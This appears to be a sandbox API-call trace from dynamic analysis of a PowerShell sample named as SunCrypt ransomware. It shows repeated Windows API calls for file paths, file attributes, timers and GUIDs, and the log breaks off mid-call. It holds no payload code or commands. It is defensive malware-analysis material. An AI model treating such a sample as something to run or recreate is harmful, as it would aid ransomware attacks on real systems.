0x0 [0100.439] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0100.439] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0100.439] CoTaskMemFree (pv=0x427a048) [0100.439] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: 
lpPerformanceCount=0x4ebee60*=1701325591591) returned 1 [0100.439] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.439] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.440] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0100.440] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0100.440] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0100.440] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.440] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.442] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701325848758) returned 1 [0100.442] EtwEventActivityIdControl () returned 0x0 [0100.442] 
EtwEventActivityIdControl () returned 0x0 [0100.442] EtwEventActivityIdControl () returned 0x0 [0100.442] EtwEventActivityIdControl () returned 0x0 [0100.443] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xb2599af3, Data2=0x5aab, Data3=0x48dc, Data4=([0]=0xb2, [1]=0x54, [2]=0x3, [3]=0xb2, [4]=0xd9, [5]=0x55, [6]=0x91, [7]=0xf9))) returned 0x0 [0100.443] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0100.443] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0100.443] CoTaskMemFree (pv=0x427a048) [0100.443] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701326001475) returned 1 [0100.443] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.444] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.444] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0100.444] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0100.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0100.444] 
GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.444] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.446] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701326275819) returned 1 [0100.446] EtwEventActivityIdControl () returned 0x0 [0100.446] EtwEventActivityIdControl () returned 0x0 [0100.446] EtwEventActivityIdControl () returned 0x0 [0100.447] EtwEventActivityIdControl () returned 0x0 [0100.447] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xbfc4a7db, Data2=0x476b, Data3=0x4b5b, Data4=([0]=0x89, [1]=0xe5, [2]=0xec, [3]=0xe7, [4]=0x2d, [5]=0x2, [6]=0x83, [7]=0x4d))) returned 0x0 [0100.447] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0100.447] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0100.447] CoTaskMemFree (pv=0x427a048) [0100.448] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701326411965) returned 1 [0100.448] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.448] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.448] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0100.448] 
GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0100.448] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0100.448] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.448] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.450] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701326634021) returned 1 [0100.450] EtwEventActivityIdControl () returned 0x0 [0100.450] EtwEventActivityIdControl () returned 0x0 [0100.450] EtwEventActivityIdControl () returned 0x0 [0100.450] EtwEventActivityIdControl () returned 0x0 [0100.451] CoCreateGuid (in: pguid=0x4ebf0c0 | out: pguid=0x4ebf0c0*(Data1=0x59fb2fa3, Data2=0x6a43, Data3=0x43e3, Data4=([0]=0x91, [1]=0xf5, [2]=0xf6, [3]=0x65, [4]=0xeb, [5]=0xf6, [6]=0x24, [7]=0xe7))) returned 0x0 [0100.451] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0100.451] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0100.451] CoTaskMemFree (pv=0x427a048) [0100.452] EtwEventActivityIdControl () 
returned 0x0 [0100.452] EtwEventActivityIdControl () returned 0x0 [0100.452] EtwEventActivityIdControl () returned 0x0 [0100.452] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebec44 | out: lpPerformanceCount=0x4ebec44*=1701326863713) returned 1 [0100.452] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.452] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.452] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe930) returned 1 [0100.452] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebebf4 | out: lpFileInformation=0x4ebebf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0100.452] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe92c) returned 1 [0100.452] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.453] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.456] 
QueryPerformanceCounter (in: lpPerformanceCount=0x4ebec0c | out: lpPerformanceCount=0x4ebec0c*=1701327222979) returned 1 [0100.497] EtwEventActivityIdControl () returned 0x0 [0100.602] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x97490a07, Data2=0x94a1, Data3=0x402f, Data4=([0]=0xa5, [1]=0xf8, [2]=0xce, [3]=0xf3, [4]=0xf9, [5]=0x56, [6]=0x57, [7]=0xaf))) returned 0x0 [0100.602] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0100.602] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0100.602] CoTaskMemFree (pv=0x427a048) [0100.603] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.603] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0100.603] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0100.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0100.603] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", 
nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.603] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.606] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701342256826) returned 1 [0100.606] EtwEventActivityIdControl () returned 0x0 [0100.606] EtwEventActivityIdControl () returned 0x0 [0100.606] EtwEventActivityIdControl () returned 0x0 [0100.607] EtwEventActivityIdControl () returned 0x0 [0100.607] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x825c708f, Data2=0xf592, Data3=0x4ef3, Data4=([0]=0x98, [1]=0xbb, [2]=0x4f, [3]=0xc4, [4]=0xd5, [5]=0xce, [6]=0x8a, [7]=0x84))) returned 0x0 [0100.608] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0100.608] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0100.608] CoTaskMemFree (pv=0x427a048) [0100.608] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701342468968) returned 1 [0100.608] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.608] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.608] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0100.608] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: 
"c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0100.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0100.609] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.609] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.612] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701342846136) returned 1 [0100.612] EtwEventActivityIdControl () returned 0x0 [0100.612] EtwEventActivityIdControl () returned 0x0 [0100.612] EtwEventActivityIdControl () returned 0x0 [0100.613] CoCreateGuid (in: pguid=0x4ebecf8 | out: pguid=0x4ebecf8*(Data1=0xe778dc14, Data2=0x1f8c, Data3=0x46ae, Data4=([0]=0xa0, [1]=0xb5, [2]=0xdd, [3]=0x31, [4]=0xee, [5]=0x39, [6]=0xc6, [7]=0x8b))) returned 0x0 [0100.613] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0100.613] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0100.613] CoTaskMemFree (pv=0x427a048) [0100.614] EtwEventActivityIdControl () returned 0x0 [0100.614] EtwEventActivityIdControl () returned 0x0 [0100.614] EtwEventActivityIdControl () returned 0x0 [0100.615] QueryPerformanceCounter (in: 
lpPerformanceCount=0x4ebe87c | out: lpPerformanceCount=0x4ebe87c*=1701343118206) returned 1 [0100.615] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.615] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.615] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe568) returned 1 [0100.615] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe82c | out: lpFileInformation=0x4ebe82c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0100.615] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe564) returned 1 [0100.615] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.615] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.618] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebe844 | out: lpPerformanceCount=0x4ebe844*=1701343484081) returned 1 [0100.812] EtwEventActivityIdControl () 
returned 0x0 [0100.815] EtwEventActivityIdControl () returned 0x0 [0100.815] EtwEventActivityIdControl () returned 0x0 [0100.815] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xff49c87d, Data2=0x6378, Data3=0x4f20, Data4=([0]=0x9d, [1]=0x4f, [2]=0x74, [3]=0xcc, [4]=0xff, [5]=0x7e, [6]=0x15, [7]=0xd1))) returned 0x0 [0100.815] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0100.815] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0100.815] CoTaskMemFree (pv=0x427a048) [0100.815] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.815] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.815] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0100.815] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0100.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0100.816] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: 
lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.816] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.816] EtwEventActivityIdControl () returned 0x0 [0100.816] EtwEventActivityIdControl () returned 0x0 [0100.817] EtwEventActivityIdControl () returned 0x0 [0100.817] CoCreateGuid (in: pguid=0x4ebecf8 | out: pguid=0x4ebecf8*(Data1=0x680258d7, Data2=0xb284, Data3=0x45be, Data4=([0]=0xac, [1]=0xb6, [2]=0x3a, [3]=0xcc, [4]=0xe4, [5]=0xfb, [6]=0x6f, [7]=0x4a))) returned 0x0 [0100.817] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0100.817] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0100.817] CoTaskMemFree (pv=0x427a048) [0100.817] EtwEventActivityIdControl () returned 0x0 [0100.817] EtwEventActivityIdControl () returned 0x0 [0100.817] EtwEventActivityIdControl () returned 0x0 [0100.818] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.818] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe568) returned 1 [0100.818] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe82c | out: lpFileInformation=0x4ebe82c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, 
ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0100.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe564) returned 1 [0100.818] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.818] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.821] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebe844 | out: lpPerformanceCount=0x4ebe844*=1701363737188) returned 1 [0100.890] EtwEventActivityIdControl () returned 0x0 [0100.894] EtwEventActivityIdControl () returned 0x0 [0100.894] EtwEventActivityIdControl () returned 0x0 [0100.894] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xa902c150, Data2=0xa77f, Data3=0x4b6c, Data4=([0]=0xa3, [1]=0xa7, [2]=0x1d, [3]=0x4c, [4]=0x92, [5]=0x56, [6]=0x12, [7]=0xad))) returned 0x0 [0100.894] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0100.894] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0100.894] CoTaskMemFree 